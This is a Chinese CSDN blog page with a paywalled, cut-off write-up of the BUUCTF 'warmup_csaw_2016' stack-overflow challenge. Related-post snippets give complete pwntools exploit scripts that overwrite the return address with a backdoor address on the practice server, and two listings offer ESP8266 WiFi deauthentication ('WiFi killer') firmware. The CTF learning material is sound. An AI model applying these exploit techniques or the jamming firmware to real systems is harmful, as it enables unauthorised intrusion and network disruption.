【BUUCTF - PWN】warmup_csaw_2016

最新推荐文章于 2024-07-04 23:51:12 发布

古月浪子

最新推荐文章于 2024-07-04 23:51:12 发布

阅读量3.2k

点赞数

分类专栏： BUUCTF - PWN

本文链接：https://blog.csdn.net/tqydyqt/article/details/104972433

版权

checksec一下，发现啥保护也没开

IDA打开看看，又是明显的栈溢出漏洞，看到v5的长度为0x40、后门函数的地址为0x40060d

from pwn import *
from LibcSearcher import *

context.os='linux'
context.arch='amd64'
context.log_level=

最低0.47元/天解锁文章

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

古月浪子

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
3
评论
复制链接

分享到 QQ

分享到新浪微博

扫一扫

专栏目录

BUUCTF|warmup_csaw_2016 1

cm_zl

04-30

1254

from pwn import * context.log_level = 'debug' io=remote('node3.buuoj.cn', "28247") payload = "A"*(0x48) + p64(0x40060D) io.sendline(payload) io.interactive()

BUUCTF-pwn2_sctf_2016

weixin_44145820的博客

03-06

988

这题利用的是负数转无符号数造成缓冲区溢出，以及泄露libc基地址执行ROP 题目分析由于NX开启，我们考虑使用ROP，Canary没有打开使得这题变得很方便下面是vuln函数：在该函数中，程序读入一个字符串并转化为带符号整形（signed int），这时，如果我们输入负数可以避开不能大于32的检查在get_n函数中，读入长度被强制转换为unsigned int，此时-1变成了42949...

3 条评论您还未登录，请先登录后发表或查看评论

BUUCTF PWN warmup_csaw_2016

Rt1Text的博客

04-22

409

1.checksec+运行 64位/没有保护 2.64位IDA进行 1.main 函数明显的溢出函数gets() 跟进v5看看 offset = 0x40+8 shift+f12 真不错,cat flag.txt 找它的地址 3.上脚本 from pwn import* #p=process('./3warmup') p=remote("node4.buuoj.cn",28180) flag_addr=0x400611 payload=b'a'*(0...

【BUUCTF-PWN】3-warmup_csaw_2016

最新发布

燕麦葡萄干的博客

07-04

163

checksec检查是64位，未开启任何保护。直接字符串查找system或者flag。后门函数的地址是0x40060D。gets()函数存在栈溢出。

[BUUCTF-pwn]——warmup_csaw_2016

Y_peak的博客

01-30

3993

BUUCTF——warmup_csaw_2016 题目地址：https://buuoj.cn/challenges 题目：管他三七二十一，先将文件下载下来再说。老规矩，现在Linux上用checksec看看文件。64位，Stack、NX、PIE都没有开，应该是栈溢出的题。赶快 go go go 去window 上用IDA反汇编看看，看到返回的是gets函数，一个典型的可以利用栈溢出覆盖的地方。其他没什么有用的信息。按Shift + F12，看一下字符串。不看不知道一看有惊喜。cat flag.

warmup_csaw_2016

weixin_56301399的博客

07-20

1355

做了几道入门的题，从原来的柔弱蚂蚁到现在稍稍强壮的蚂蚁，我决定实施菜狗子计划，让蚂蚁继续进化。题目中的思路很清晰，对于栈溢出，我们先判断是否有栈溢出的漏洞，之后去找系统调用的函数，然后查到他的地址，最后就是我们的代码构建了。偏移量的计算=（数组本身大小+对应位的偏移64位是ox8）然后加上我们系统调用函数的地址。...

PWN学习记录（3）BUUCTF-warmup_csaw_2016

m0_58824086的博客

08-01

471

由**char v5[64]**可得，在main函数的栈帧中，划分了一个64字节的存储空间，也就是说只需要存入64个字节地址，就可以get函数返回地址。下载题目得到 warmup_csaw_2016，利用 file 命令查看该文件的类型，再通过checksec ./filename查看保护机制。将warmup_csaw_2016文件放入IDA中查看，打开字符串窗口。可得该文件是64位且该题任何保护都没有打开，所以我们可以实现最简单的栈溢出。将exp文件输入进1.py中，Esc+:wq保存并退出1.py。

Wi-PWN_8.0_ENGLISH_OLED.bin

08-25

这是ESP8266的带OLED显示的WIFI杀手固件。

Wi-PWN_8.0_ENGLISH.bin

08-25

ESP8266的WIFI杀手固件，这是不带显示的。我后续更新带OLED显示的固件。教程后将更新。

【BUUCTF - PWN】ciscn_2019_c_1

古月浪子的博客

03-20

4081

checksec一下 IDA打开看看，encrypt函数内存在栈溢出漏洞由于程序会将输入的内容加密，这会破坏我们的payload，所以注意到strlen函数，通过在payload开头放上 \0 来绕过加密由于程序内没有后门函数，也没有system函数，所以考虑ret2libc 特别注意到题目是部署在Ubuntu18上的，因此调用system需要栈对齐，这里填充ret来对齐 from pwn...

buuctf warmup_csaw_2016

yidalipao1的博客

09-03

486

buuctf pwn

BUUCTF warmup_csaw_2016

m0_54262894的博客

08-20

349

BUUCTF warmup_csaw_2016 下载文件，把它拖入虚拟机中先checksec一下这是一个64位的文件，并且没有开启任何的保护我们先运行一下试试发现它给出了一个地址，我们先记下，可能会用到放入64位IDA中查看一下他的代码伪C代码↓ 汇编代码↓ 发现了一个函数sprintf，并且用%p的方式来输出，也就是输出地址下面是我搜索到的信息我们双击40060D看一下再回过头来看代码众所周知gets函.

buuctf 之warmup_csaw_2016

weixin_54452942的博客

03-25

394

发现了一个gets函数可以溢出，并且在上面的运行中，我们看到他输出了一个地址，在下面的sprintf函数中将一个函数的地址输出了，我们去看看这个函数是干什么的。一种是ida直接看（不一定准），40h是64字节，再加8字节的rbp就是ret的位置。这里的返回地址，也就是rbp下面的地址是df28，我们输入的‘aaaaa’在dee0。是一个没有保护机制的64位x86架构的小端可执行程序。断在main函数地址，或者调用gets函数的地址也行。减一下刚好和ida中的一样。两种方式获得填充数据大小。

[每日一PWN]BUUCTF warmup_csaw_2016

qq_55233040的博客

11-20

484

和第一题RIP一样，是经典而基础的ret2text。

buuctf|warmup_csaw_2016 1

m0_64236521的博客

04-15

1357

buuctf|warmup_csaw_2016 1 下载文件运行如下 checksec查看下保护 file一下，是64位文件拉进ida，发现gets(v5),查看v5,明显的栈溢出找到system，地址40060d 直接exp from pwn import* p=remote('node4.buuoj.cn',28415) payload=b'A'*0x48+p64(0x40060D) p.sendline(payload) p.interactive() 得flag ...

BUUCTF-warmup_csaw_2016 （新手pwner的成长日记3）

weixin_58410275的博客

04-23

1010

解释一下这里填充数据为什么是4*16，我们在ida里面双击v5这个字符进入栈区一看，它是在s的基础上，从0到40的var_40占用的是4*16个字节的空间，+8是因为64位文件的rbp需要填充。的函数，进去一看，不得了不得了，我们的payload直接利用sub_40060D函数就行了，甚至不需要获取shell权限，地址在反编译之前可以在函数末尾看见的，就不做展示了。由于文件的漏洞函数直接打开了flag文件，所以我们直接得到了flag的交互。然后我们再翻一翻，找一找，有个。gets的内容，这里思路就到达。

[BUUCTF-PWN] warmup_csaw_2016

m0_46098032的博客

01-03

374

下载文件，checksec看一下，保护都没开，64位文件。用IDA64打开文件，查看一下main函数。可以看到明显的栈溢出漏洞（gets）。看一下v5，v5大小是 0x40, 返回地址是8 字节，溢出大小就是0x48。 sub_40060D有点可疑，双击看一下。发现这里就是system函数，我们在构造pyaload的时候加上sub_40060D。 exp为： from pwn import * p = remote('node4.buuoj.cn', 2574...

buu:pwn warmup_csaw_2016

weixin_60553183的博客

11-29

2629

buu:pwn warmup_csaw_2016 第一次写pwn题，得到文件放入ida 其实一开始和re的题很像，都是寻找关键函数，怎么找，个人理解是要关注输入输出有无比较的地方，这里shb_40060D很明显就是关键函数，点进去，为什么呢，因为gets()函数很明显会有栈溢出漏洞，sub_40060D函数是后门。找到了system和 cat flag.txt。进入虚拟机，对文件进行checksec操作发现没有任何防护写exp 在终端运行得flag. ...

BUUCTF warmup_csaw_2016 writeup

weixin_45999107的博客

02-09

2290

BUUCTF warmup_csaw_2016 打开IDA，发现： PS：这个题直接把函数位置给了。。。可以看出，gets绝对有问题，v5的长度为0x40，同时加上返回地址8个字节，所以要溢出总长度为0x48，在运行程序时可以看到sub_40060D的地址就为0x40060D… 所以构建payload：payload = ’a’ * 0x48 + p64(0x40060D)，得flag...

mqtt-pwn安装

09-20

3. 启动mqtt-pwn容器：使用命令`sudo docker-compose up --build --detach`启动mqtt-pwn容器。另外，您还需要安装以下软件： 1. 安装pwntools：使用命令`python3 -m pip install --upgrade pwntools`来安装并更新...